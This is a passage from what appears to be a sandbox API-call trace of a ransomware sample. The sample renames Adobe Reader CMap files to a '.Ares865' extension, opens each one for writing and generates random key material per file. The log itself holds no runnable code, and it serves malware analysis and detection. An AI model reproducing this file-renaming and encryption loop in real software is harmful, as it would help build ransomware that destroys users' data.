param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H.Ares865") returned 74 [0161.121] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-h.ares865"), dwFlags=0x1) returned 1 [0161.123] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6398) returned 1 [0161.123] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.124] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.124] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.126] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.127] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.127] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.127] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90ms-RKSJ-UCS2" | out: lpString1="90ms-RKSJ-UCS2") returned="90ms-RKSJ-UCS2" [0161.127] lstrlenW (lpString="90ms-RKSJ-UCS2") returned 14 [0161.128] lstrlenW (lpString="Ares865") returned 7 [0161.128] lstrcmpiW (lpString1="SJ-UCS2", lpString2="Ares865") returned 1 [0161.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2.Ares865") returned 77 [0161.128] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.130] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=112126) returned 1 [0161.131] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.143] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.145] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90ms-RKSJ-V" | out: lpString1="90ms-RKSJ-V") returned="90ms-RKSJ-V" [0161.145] lstrlenW (lpString="90ms-RKSJ-V") returned 11 [0161.145] lstrlenW (lpString="Ares865") returned 7 [0161.145] lstrcmpiW (lpString1="-RKSJ-V", lpString2="Ares865") returned 1 [0161.146] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V.Ares865") returned 74 [0161.146] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-v.ares865"), dwFlags=0x1) returned 1 [0161.147] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.147] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4454) returned 1 [0161.148] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.148] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.148] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.151] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.152] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.152] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.152] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90msp-RKSJ-H" | out: lpString1="90msp-RKSJ-H") returned="90msp-RKSJ-H" [0161.152] lstrlenW (lpString="90msp-RKSJ-H") returned 12 [0161.152] lstrlenW (lpString="Ares865") returned 7 [0161.152] lstrcmpiW (lpString1="-RKSJ-H", lpString2="Ares865") returned 1 [0161.153] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H.Ares865") returned 75 [0161.153] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-h.ares865"), dwFlags=0x1) returned 1 [0161.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.155] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6327) returned 1 [0161.155] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.156] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.156] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.160] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.161] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.161] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.161] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90msp-RKSJ-V" | out: lpString1="90msp-RKSJ-V") returned="90msp-RKSJ-V" [0161.161] lstrlenW (lpString="90msp-RKSJ-V") returned 12 [0161.161] lstrlenW (lpString="Ares865") returned 7 [0161.161] lstrcmpiW (lpString1="-RKSJ-V", lpString2="Ares865") returned 1 [0161.161] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V.Ares865") returned 75 [0161.162] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-v.ares865"), dwFlags=0x1) returned 1 [0161.163] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.163] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4436) returned 1 [0161.164] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.168] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.168] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.168] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.169] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90pv-RKSJ-H" | out: lpString1="90pv-RKSJ-H") returned="90pv-RKSJ-H" [0161.169] lstrlenW (lpString="90pv-RKSJ-H") returned 11 [0161.169] lstrlenW (lpString="Ares865") returned 7 [0161.169] lstrcmpiW (lpString1="-RKSJ-H", lpString2="Ares865") returned 1 [0161.169] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H.Ares865") returned 74 [0161.169] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-h.ares865"), dwFlags=0x1) returned 1 [0161.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8239) returned 1 [0161.173] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.174] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.174] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.177] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.178] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.178] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.178] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90pv-RKSJ-UCS2" | out: lpString1="90pv-RKSJ-UCS2") returned="90pv-RKSJ-UCS2" [0161.178] lstrlenW (lpString="90pv-RKSJ-UCS2") returned 14 [0161.178] lstrlenW (lpString="Ares865") returned 7 [0161.178] lstrcmpiW (lpString1="SJ-UCS2", lpString2="Ares865") returned 1 [0161.179] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2.Ares865") returned 77 [0161.179] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.180] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.181] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1854) returned 1 [0161.181] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.182] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.182] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.185] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.186] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.186] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.186] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90pv-RKSJ-UCS2C" | out: lpString1="90pv-RKSJ-UCS2C") returned="90pv-RKSJ-UCS2C" [0161.186] lstrlenW (lpString="90pv-RKSJ-UCS2C") returned 15 [0161.186] lstrlenW (lpString="Ares865") returned 7 [0161.186] lstrcmpiW (lpString1="J-UCS2C", lpString2="Ares865") returned 1 [0161.187] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C.Ares865") returned 78 [0161.187] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2c"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2c.ares865"), dwFlags=0x1) returned 1 [0161.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.189] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=102591) returned 1 [0161.189] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.190] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.190] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.200] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.201] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.201] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.203] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Add-RKSJ-H" | out: lpString1="Add-RKSJ-H") returned="Add-RKSJ-H" [0161.203] lstrlenW (lpString="Add-RKSJ-H") returned 10 [0161.203] lstrlenW (lpString="Ares865") returned 7 [0161.203] lstrcmpiW (lpString1="-RKSJ-H", lpString2="Ares865") returned 1 [0161.203] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H.Ares865") returned 73 [0161.203] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-h.ares865"), dwFlags=0x1) returned 1 [0161.206] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.206] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15845) returned 1 [0161.206] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.207] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.207] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.210] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.211] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.211] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.212] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Add-RKSJ-V" | out: lpString1="Add-RKSJ-V") returned="Add-RKSJ-V" [0161.212] lstrlenW (lpString="Add-RKSJ-V") returned 10 [0161.212] lstrlenW (lpString="Ares865") returned 7 [0161.212] lstrcmpiW (lpString1="-RKSJ-V", lpString2="Ares865") returned 1 [0161.212] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V.Ares865") returned 73 [0161.212] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-v.ares865"), dwFlags=0x1) returned 1 [0161.217] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Add-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\add-rksj-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.217] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4027) returned 1 [0161.218] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.220] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.221] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.221] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.222] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-0" | out: lpString1="Adobe-CNS1-0") returned="Adobe-CNS1-0" [0161.222] lstrlenW (lpString="Adobe-CNS1-0") returned 12 [0161.222] lstrlenW (lpString="Ares865") returned 7 [0161.222] lstrcmpiW (lpString1="-CNS1-0", lpString2="Ares865") returned 1 [0161.222] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0.Ares865") returned 75 [0161.222] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-0"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-0.ares865"), dwFlags=0x1) returned 1 [0161.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4034) returned 1 [0161.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.229] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.230] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.231] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Adobe-CNS1-1" | out: lpString1="Adobe-CNS1-1") returned="Adobe-CNS1-1" [0161.231] lstrlenW (lpString="Adobe-CNS1-1") returned 12 [0161.231] lstrlenW (lpString="Ares865") returned 7 [0161.231] lstrcmpiW (lpString1="-CNS1-1", lpString2="Ares865") returned 1 [0161.231] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1.Ares865") returned 75 [0161.231] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-1"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-1.ares865"), dwFlags=0x1) returned 1 [0161.233] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.233] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4218) returned 1 [0161.234] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.234] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.234] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.239] CryptAcquireContextW (in: 